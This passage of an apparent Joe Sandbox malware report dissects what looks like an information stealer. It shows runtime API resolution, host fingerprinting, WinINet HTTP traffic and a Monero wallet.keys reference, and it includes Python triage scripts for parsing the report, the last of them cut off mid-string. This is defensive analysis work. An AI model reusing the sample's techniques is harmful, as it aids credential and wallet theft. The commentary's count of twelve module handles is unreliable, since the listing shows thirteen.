                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 984f4ab6b8e90e763e751edebf295cbca8b26a09e9449318413f9c868b88af75
                              • Instruction ID: 39199f1a603cc27a3045fa8286a39654da4432808c6bd60719bc5b5550263324
                              • Opcode Fuzzy Hash: 984f4ab6b8e90e763e751edebf295cbca8b26a09e9449318413f9c868b88af75
                              • Instruction Fuzzy Hash: 7071A175A10218ABDB14DF90DC59FEE7374BB44300F10819FF2066B294DBB86A85CF59

                              Control-flow Graph

                              control_flow_graph 1356 4d7690-4d76da GetWindowsDirectoryA 1357 4d76dc 1356->1357 1358 4d76e3-4d7757 GetVolumeInformationA call 4d8e90 * 3 1356->1358 1357->1358 1365 4d7768-4d776f 1358->1365 1366 4d778c-4d77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 4d7771-4d778a call 4d8e90 1365->1367 1369 4d77a9-4d77b6 call 4daa50 1366->1369 1370 4d77b8-4d77e8 wsprintfA call 4daa50 1366->1370 1367->1365 1377 4d780e-4d781e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004D76D2
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004D770F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D7793
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D779A
                              • wsprintfA.USER32 ref: 004D77D0
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: b3691c8a34649f5864ff138a008f1f6f4e7a467097230ee062841492020bbb66
                              • Instruction ID: 52151d23f7672283911a6aa4d1e6a78bf54dd404b633de7e0c3b09cf2f6f82e0
                              • Opcode Fuzzy Hash: b3691c8a34649f5864ff138a008f1f6f4e7a467097230ee062841492020bbb66
                              • Instruction Fuzzy Hash: 9C4164B1D043589BDB10DB94DC95BEEB7B8AF48704F10419FF509AB380E7786A44CBA9
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004C11B7), ref: 004D7A10
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D7A17
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 004D7A2F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 457e7f53c907f3f71043a7a09c481ff6bcc02ccf3f327638edb7963d5ccbc56c
                              • Instruction ID: a1ed1049715f35441d40e3ee2c01333acc1c363fec7b33ef9b5fe7db824165b1
                              • Opcode Fuzzy Hash: 457e7f53c907f3f71043a7a09c481ff6bcc02ccf3f327638edb7963d5ccbc56c
                              • Instruction Fuzzy Hash: 3FF0AFB1958209EBC704CF88DC45BAEBBB8FB04711F10421BF605A2380C3781500CBA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 634474ca97dbfc87d0fd3895834ceff9881e53a9f9730258b91f4dffe86d056a
                              • Instruction ID: 9bef633cc6a627c81df89ccd8423a1f8559a3b63616c9d6ac26427abc69f96a0
                              • Opcode Fuzzy Hash: 634474ca97dbfc87d0fd3895834ceff9881e53a9f9730258b91f4dffe86d056a
                              • Instruction Fuzzy Hash: 8ED05E7494430C9BCB04DFE0994AADDBB78FB4D215F00055AD90562250EA345442CA69

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph nodes (id: address range, API calls in the block):
                              • 633: 4d9f20-4d9f2a
                              • 634: 4da346-4da3da, LoadLibraryA x8
                              • 635: 4d9f30-4da341, GetProcAddress x43
                              • 636: 4da3dc-4da451, GetProcAddress x5
                              • 637: 4da456-4da45d
                              • 638: 4da526-4da52d
                              • 639: 4da463-4da521, GetProcAddress x8
                              • 640: 4da52f-4da5a3, GetProcAddress x5
                              • 641: 4da5a8-4da5af
                              • 642: 4da5b5-4da642, GetProcAddress x6
                              • 643: 4da647-4da64e
                              • 644: 4da72f-4da736
                              • 645: 4da654-4da72a, GetProcAddress x9
                              • 646: 4da738-4da7ad, GetProcAddress x5
                              • 647: 4da7b2-4da7b9
                              • 648: 4da7ec-4da7f3
                              • 649: 4da7bb-4da7e7, GetProcAddress x2
                              • 650: 4da825-4da82c
                              • 651: 4da7f5-4da820, GetProcAddress x2
                              • 652: 4da922-4da929
                              • 653: 4da832-4da91d, GetProcAddress x10
                              • 654: 4da98d-4da994
                              • 655: 4da92b-4da988, GetProcAddress x4
                              • 656: 4da9ae-4da9b5
                              • 657: 4da996-4da9a9, GetProcAddress x1
                              • 658: 4daa18-4daa19
                              • 659: 4da9b7-4daa13, GetProcAddress x4
                              control_flow_graph edges (source -> targets):
                              • 633 -> 634, 635
                              • 634 -> 636, 637
                              • 635 -> 634
                              • 636 -> 637
                              • 637 -> 638, 639
                              • 638 -> 640, 641
                              • 639 -> 638
                              • 640 -> 641
                              • 641 -> 642, 643
                              • 642 -> 643
                              • 643 -> 644, 645
                              • 644 -> 646, 647
                              • 645 -> 644
                              • 646 -> 647
                              • 647 -> 648, 649
                              • 648 -> 650, 651
                              • 649 -> 648
                              • 650 -> 652, 653
                              • 651 -> 650
                              • 652 -> 654, 655
                              • 653 -> 652
                              • 654 -> 656, 657
                              • 655 -> 654
                              • 656 -> 658, 659
                              • 657 -> 656
                              • 659 -> 658
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,01295D90), ref: 004D9F3D
                              • GetProcAddress.KERNEL32(74DD0000,01295C50), ref: 004D9F55
                              • GetProcAddress.KERNEL32(74DD0000,012A96D0), ref: 004D9F6E
                              • GetProcAddress.KERNEL32(74DD0000,012A9640), ref: 004D9F86
                              • GetProcAddress.KERNEL32(74DD0000,012A9610), ref: 004D9F9E
                              • GetProcAddress.KERNEL32(74DD0000,012A9628), ref: 004D9FB7
                              • GetProcAddress.KERNEL32(74DD0000,0129BD88), ref: 004D9FCF
                              • GetProcAddress.KERNEL32(74DD0000,012AD218), ref: 004D9FE7
                              • GetProcAddress.KERNEL32(74DD0000,012AD140), ref: 004DA000
                              • GetProcAddress.KERNEL32(74DD0000,012AD188), ref: 004DA018
                              • GetProcAddress.KERNEL32(74DD0000,012AD1E8), ref: 004DA030
                              • GetProcAddress.KERNEL32(74DD0000,01295D50), ref: 004DA049
                              • GetProcAddress.KERNEL32(74DD0000,01295CD0), ref: 004DA061
                              • GetProcAddress.KERNEL32(74DD0000,01295C70), ref: 004DA079
                              • GetProcAddress.KERNEL32(74DD0000,01295D30), ref: 004DA092
                              • GetProcAddress.KERNEL32(74DD0000,012AD368), ref: 004DA0AA
                              • GetProcAddress.KERNEL32(74DD0000,012AD1A0), ref: 004DA0C2
                              • GetProcAddress.KERNEL32(74DD0000,0129BBA8), ref: 004DA0DB
                              • GetProcAddress.KERNEL32(74DD0000,01295C90), ref: 004DA0F3
                              • GetProcAddress.KERNEL32(74DD0000,012AD2A8), ref: 004DA10B
                              • GetProcAddress.KERNEL32(74DD0000,012AD260), ref: 004DA124
                              • GetProcAddress.KERNEL32(74DD0000,012AD1B8), ref: 004DA13C
                              • GetProcAddress.KERNEL32(74DD0000,012AD158), ref: 004DA154
                              • GetProcAddress.KERNEL32(74DD0000,01295CB0), ref: 004DA16D
                              • GetProcAddress.KERNEL32(74DD0000,012AD350), ref: 004DA185
                              • GetProcAddress.KERNEL32(74DD0000,012AD1D0), ref: 004DA19D
                              • GetProcAddress.KERNEL32(74DD0000,012AD200), ref: 004DA1B6
                              • GetProcAddress.KERNEL32(74DD0000,012AD230), ref: 004DA1CE
                              • GetProcAddress.KERNEL32(74DD0000,012AD248), ref: 004DA1E6
                              • GetProcAddress.KERNEL32(74DD0000,012AD2C0), ref: 004DA1FF
                              • GetProcAddress.KERNEL32(74DD0000,012AD170), ref: 004DA217
                              • GetProcAddress.KERNEL32(74DD0000,012AD278), ref: 004DA22F
                              • GetProcAddress.KERNEL32(74DD0000,012AD290), ref: 004DA248
                              • GetProcAddress.KERNEL32(74DD0000,012AA6C0), ref: 004DA260
                              • GetProcAddress.KERNEL32(74DD0000,012AD2D8), ref: 004DA278
                              • GetProcAddress.KERNEL32(74DD0000,012AD3C8), ref: 004DA291
                              • GetProcAddress.KERNEL32(74DD0000,01295DD0), ref: 004DA2A9
                              • GetProcAddress.KERNEL32(74DD0000,012AD2F0), ref: 004DA2C1
                              • GetProcAddress.KERNEL32(74DD0000,012959B0), ref: 004DA2DA
                              • GetProcAddress.KERNEL32(74DD0000,012AD308), ref: 004DA2F2
                              • GetProcAddress.KERNEL32(74DD0000,012AD320), ref: 004DA30A
                              • GetProcAddress.KERNEL32(74DD0000,01295870), ref: 004DA323
                              • GetProcAddress.KERNEL32(74DD0000,012959D0), ref: 004DA33B
                              • LoadLibraryA.KERNEL32(012AD338,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA34D
                              • LoadLibraryA.KERNEL32(012AD0F8,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA35E
                              • LoadLibraryA.KERNEL32(012AD380,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA370
                              • LoadLibraryA.KERNEL32(012AD398,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA382
                              • LoadLibraryA.KERNEL32(012AD3B0,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA393
                              • LoadLibraryA.KERNEL32(012AD110,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA3A5
                              • LoadLibraryA.KERNEL32(012AD3E0,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA3B7
                              • LoadLibraryA.KERNEL32(012AD128,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA3C8
                              • GetProcAddress.KERNEL32(75290000,01295710), ref: 004DA3EA
                              • GetProcAddress.KERNEL32(75290000,012AD4E8), ref: 004DA402
                              • GetProcAddress.KERNEL32(75290000,012A9228), ref: 004DA41A
                              • GetProcAddress.KERNEL32(75290000,012AD518), ref: 004DA433
                              • GetProcAddress.KERNEL32(75290000,01295890), ref: 004DA44B
                              • GetProcAddress.KERNEL32(73440000,0129BA68), ref: 004DA470
                              • GetProcAddress.KERNEL32(73440000,012958F0), ref: 004DA489
                              • GetProcAddress.KERNEL32(73440000,0129B900), ref: 004DA4A1
                              • GetProcAddress.KERNEL32(73440000,012AD578), ref: 004DA4B9
                              • GetProcAddress.KERNEL32(73440000,012AD428), ref: 004DA4D2
                              • GetProcAddress.KERNEL32(73440000,012958D0), ref: 004DA4EA
                              • GetProcAddress.KERNEL32(73440000,01295970), ref: 004DA502
                              • GetProcAddress.KERNEL32(73440000,012AD590), ref: 004DA51B
                              • GetProcAddress.KERNEL32(752C0000,01295770), ref: 004DA53C
                              • GetProcAddress.KERNEL32(752C0000,012957F0), ref: 004DA554
                              • GetProcAddress.KERNEL32(752C0000,012AD488), ref: 004DA56D
                              • GetProcAddress.KERNEL32(752C0000,012AD4B8), ref: 004DA585
                              • GetProcAddress.KERNEL32(752C0000,012958B0), ref: 004DA59D
                              • GetProcAddress.KERNEL32(74EC0000,0129BA90), ref: 004DA5C3
                              • GetProcAddress.KERNEL32(74EC0000,0129B7C0), ref: 004DA5DB
                              • GetProcAddress.KERNEL32(74EC0000,012AD560), ref: 004DA5F3
                              • GetProcAddress.KERNEL32(74EC0000,01295750), ref: 004DA60C
                              • GetProcAddress.KERNEL32(74EC0000,012957B0), ref: 004DA624
                              • GetProcAddress.KERNEL32(74EC0000,0129B950), ref: 004DA63C
                              • GetProcAddress.KERNEL32(75BD0000,012AD4A0), ref: 004DA662
                              • GetProcAddress.KERNEL32(75BD0000,012957D0), ref: 004DA67A
                              • GetProcAddress.KERNEL32(75BD0000,012A91C8), ref: 004DA692
                              • GetProcAddress.KERNEL32(75BD0000,012AD4D0), ref: 004DA6AB
                              • GetProcAddress.KERNEL32(75BD0000,012AD530), ref: 004DA6C3
                              • GetProcAddress.KERNEL32(75BD0000,01295810), ref: 004DA6DB
                              • GetProcAddress.KERNEL32(75BD0000,01295A10), ref: 004DA6F4
                              • GetProcAddress.KERNEL32(75BD0000,012AD500), ref: 004DA70C
                              • GetProcAddress.KERNEL32(75BD0000,012AD470), ref: 004DA724
                              • GetProcAddress.KERNEL32(75A70000,01295790), ref: 004DA746
                              • GetProcAddress.KERNEL32(75A70000,012AD548), ref: 004DA75E
                              • GetProcAddress.KERNEL32(75A70000,012AD410), ref: 004DA776
                              • GetProcAddress.KERNEL32(75A70000,012AD5A8), ref: 004DA78F
                              • GetProcAddress.KERNEL32(75A70000,012AD440), ref: 004DA7A7
                              • GetProcAddress.KERNEL32(75450000,012959F0), ref: 004DA7C8
                              • GetProcAddress.KERNEL32(75450000,012956D0), ref: 004DA7E1
                              • GetProcAddress.KERNEL32(75DA0000,01295830), ref: 004DA802
                              • GetProcAddress.KERNEL32(75DA0000,012AD3F8), ref: 004DA81A
                              • GetProcAddress.KERNEL32(6F070000,01295850), ref: 004DA840
                              • GetProcAddress.KERNEL32(6F070000,01295910), ref: 004DA858
                              • GetProcAddress.KERNEL32(6F070000,01295730), ref: 004DA870
                              • GetProcAddress.KERNEL32(6F070000,012AD458), ref: 004DA889
                              • GetProcAddress.KERNEL32(6F070000,01295930), ref: 004DA8A1
                              • GetProcAddress.KERNEL32(6F070000,01295A30), ref: 004DA8B9
                              • GetProcAddress.KERNEL32(6F070000,01295950), ref: 004DA8D2
                              • GetProcAddress.KERNEL32(6F070000,01295990), ref: 004DA8EA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 004DA901
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 004DA917
                              • GetProcAddress.KERNEL32(75AF0000,012ACF18), ref: 004DA939
                              • GetProcAddress.KERNEL32(75AF0000,012A9238), ref: 004DA951
                              • GetProcAddress.KERNEL32(75AF0000,012ACFC0), ref: 004DA969
                              • GetProcAddress.KERNEL32(75AF0000,012ACEA0), ref: 004DA982
                              • GetProcAddress.KERNEL32(75D90000,01295A50), ref: 004DA9A3
                              • GetProcAddress.KERNEL32(6E310000,012ACF78), ref: 004DA9C4
                              • GetProcAddress.KERNEL32(6E310000,01295A70), ref: 004DA9DD
                              • GetProcAddress.KERNEL32(6E310000,012ACF00), ref: 004DA9F5
                              • GetProcAddress.KERNEL32(6E310000,012AD008), ref: 004DAA0D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 803cd7ec9d8010d627cea58f24fbac0a9d1d1ba435c8620b238fb3968ce84c41
                              • Instruction ID: b93131fdc8261762c7e05feea493a0acc9ae7f52bcde2c8e64a2347cf25bf08a
                              • Opcode Fuzzy Hash: 803cd7ec9d8010d627cea58f24fbac0a9d1d1ba435c8620b238fb3968ce84c41
                              • Instruction Fuzzy Hash: 7E622BB56782049FC348DFA8ED8895677B9BB8D701710C61BBA09C3274D73DA942CB6C
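The function above is the sample's import resolver: it never carries a static import table for its real functionality, but walks a list of encrypted export names (the second GetProcAddress argument is almost always a heap pointer, not a readable string) and resolves them by module handle at runtime, which is what the "Extensive use of GetProcAddress" signature flags. A triager usually wants that hidden import table back: which module handles were used, how many exports were pulled from each, and which names Joe Sandbox could read in clear. The script below is an added example written for this page, not part of the Joe Sandbox report or of the sample; it parses a constructed handful of lines in the report's own "APIs" bullet format and reconstructs that table. The module handles (74DD0000 and the like) are load addresses of this run and are reported as-is; mapping them to DLL names needs the report's loaded-module list, which is not on this page.

```python
import re
from collections import defaultdict

# Constructed sample in the report's "APIs" line format (a handful of lines taken
# from the listing above plus one "Part of subcall" line; not the full list).
SAMPLE_API_LINES = """\
• GetProcAddress.KERNEL32(74DD0000,01295D90), ref: 004D9F3D
• GetProcAddress.KERNEL32(74DD0000,01295C50), ref: 004D9F55
• LoadLibraryA.KERNEL32(012AD338,?,004D5EF3,004E0AEB), ref: 004DA34D
• GetProcAddress.KERNEL32(75290000,01295710), ref: 004DA3EA
• GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 004DA901
• GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 004DA917
• GetProcAddress.KERNEL32(6E310000,012ACF78), ref: 004DA9C4
  • Part of subcall function 004C4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004C4899
"""

SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")   # a raw 32-bit value (handle or pointer)


def parse_api_lines(text):
    """Turn the report's bullet lines into call records; lines in another shape are skipped."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        subcall = None
        sm = SUBCALL_RE.match(line)
        if sm:
            subcall, line = sm.group("fn"), sm.group("rest")
        m = CALL_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append({
            "api": m.group("api"), "module": m.group("mod"), "args": args,
            "ref": int(m.group("ref"), 16), "subcall": subcall,
        })
    return calls


def resolved_imports(calls):
    """Group GetProcAddress calls by the module handle passed as first argument.

    The second argument is the export name: a literal when the sandbox could read
    the string at call time, otherwise only a heap pointer to the (decrypted) name.
    """
    by_handle = defaultdict(list)
    for c in calls:
        if c["api"] != "GetProcAddress" or len(c["args"]) < 2:
            continue
        handle, name = c["args"][0], c["args"][1]
        literal = not HEX8_RE.match(name)
        by_handle[handle].append({
            "name": name if literal else None,
            "name_ptr": None if literal else name,
            "ref": c["ref"],
        })
    return dict(by_handle)


def summarize(calls):
    """The counts a triager wants: modules touched, resolves per module, names that leaked."""
    imports = resolved_imports(calls)
    return {
        "modules_resolved_from": len(imports),
        "getprocaddress_calls": sum(len(v) for v in imports.values()),
        "per_module": {h: len(v) for h, v in imports.items()},
        "literal_names": sorted(e["name"] for v in imports.values() for e in v if e["name"]),
        "loadlibrary_calls": sum(1 for c in calls if c["api"] == "LoadLibraryA"),
    }


if __name__ == "__main__":
    for key, value in summarize(parse_api_lines(SAMPLE_API_LINES)).items():
        print(f"{key}: {value}")
```

Run against the full listing above, the script gives one bucket per module handle (twelve handles in this function) and shows that only two names, InternetSetOptionA and HttpQueryInfoA, were resolved from a readable string; both are wininet.dll exports, so handle 6F070000 is the wininet base in this run. Everything else was resolved from a pointer into the heap region at 0129xxxx/012Axxxx, which is where the decrypted name strings live and where a memory dump taken after this function has run will expose the complete list.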

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 4c48d0-4c4992 call 4daab0 call 4c4800 call 4daa50 * 5 InternetOpenA StrCmpCA 816 4c499b-4c499f 801->816 817 4c4994 801->817 818 4c4f1b-4c4f43 InternetCloseHandle call 4dade0 call 4ca210 816->818 819 4c49a5-4c4b1d call 4d8cf0 call 4dac30 call 4dabb0 call 4dab10 * 2 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dac30 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dac30 call 4dabb0 call 4dab10 * 2 InternetConnectA 816->819 817->816 829 4c4f45-4c4f7d call 4dab30 call 4dacc0 call 4dabb0 call 4dab10 818->829 830 4c4f82-4c4ff2 call 4d8b20 * 2 call 4daab0 call 4dab10 * 8 818->830 819->818 905 4c4b23-4c4b27 819->905 829->830 906 4c4b29-4c4b33 905->906 907 4c4b35 905->907 908 4c4b3f-4c4b72 HttpOpenRequestA 906->908 907->908 909 4c4f0e-4c4f15 InternetCloseHandle 908->909 910 4c4b78-4c4e78 call 4dacc0 call 4dabb0 call 4dab10 call 4dac30 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dac30 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dac30 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dac30 call 4dabb0 call 4dab10 call 4daa50 call 4dac30 * 2 call 4dabb0 call 4dab10 * 2 call 4dade0 lstrlen call 4dade0 * 2 lstrlen call 4dade0 HttpSendRequestA 908->910 909->818 1021 4c4e82-4c4eac InternetReadFile 910->1021 1022 4c4eae-4c4eb5 1021->1022 1023 4c4eb7-4c4f09 InternetCloseHandle call 4dab10 1021->1023 1022->1023 1024 4c4eb9-4c4ef7 call 4dacc0 call 4dabb0 call 4dab10 1022->1024 1023->909 1024->1021
                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004C4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004C4889
                                • Part of subcall function 004C4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004C4899
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004C4965
                              • StrCmpCA.SHLWAPI(?,012AE8D8), ref: 004C498A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004C4B0A
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,004E0DDE,00000000,?,?,00000000,?,",00000000,?,012AE8F8), ref: 004C4E38
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004C4E54
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004C4E68
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004C4E99
                              • InternetCloseHandle.WININET(00000000), ref: 004C4EFD
                              • InternetCloseHandle.WININET(00000000), ref: 004C4F15
                              • HttpOpenRequestA.WININET(00000000,012AE778,?,012AE0E0,00000000,00000000,00400100,00000000), ref: 004C4B65
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • InternetCloseHandle.WININET(00000000), ref: 004C4F1F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: dda0e460d5adf87a3b6a6cdbc56bec3792b9354fecd29fc858689feb76674ff1
                              • Instruction ID: 37feb6920a1dddf647e5d6aa9e85addbd9e3b1f4a8ee7d9050bc03028fbda179
                              • Opcode Fuzzy Hash: dda0e460d5adf87a3b6a6cdbc56bec3792b9354fecd29fc858689feb76674ff1
                              • Instruction Fuzzy Hash: 57121B72910118AACB14EB91CDB6FEEB379AF14304F10419FB14662291DF783F59CB6A
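The control_flow_graph lines in this report are the text form of the rendered graph: a node id, its address range (a single address for a one-instruction block), the calls and API names executed in that block with "* N" repeat counts, and "a->b" edges. For a function as long as the WinINet one above that text is hard to read by eye, and the questions that matter for triage are structural: which APIs are on every path (here InternetCloseHandle), which are reached only on some branch (HttpSendRequestA and InternetReadFile are skipped when the StrCmpCA or InternetConnectA check fails), and how many calls a block makes. The parser below is an added example written for this page, not part of Joe Sandbox or of the sample; it reads a constructed string in that format (the first nodes of the resolver function and of the WinINet function above, not the full lines) and answers those questions from the node and edge lists.

```python
import re

# Constructed sample in the report's "control_flow_graph" format: the opening nodes of
# the API-resolution function and of the WinINet function above (not the full lines).
SAMPLE_CFG = (
    "control_flow_graph 633 4d9f20-4d9f2a 634 4da346-4da3da LoadLibraryA * 8 633->634 "
    "635 4d9f30-4da341 GetProcAddress * 43 633->635 636 4da3dc-4da451 GetProcAddress * 5 "
    "634->636 637 4da456-4da45d 634->637 635->634 636->637 "
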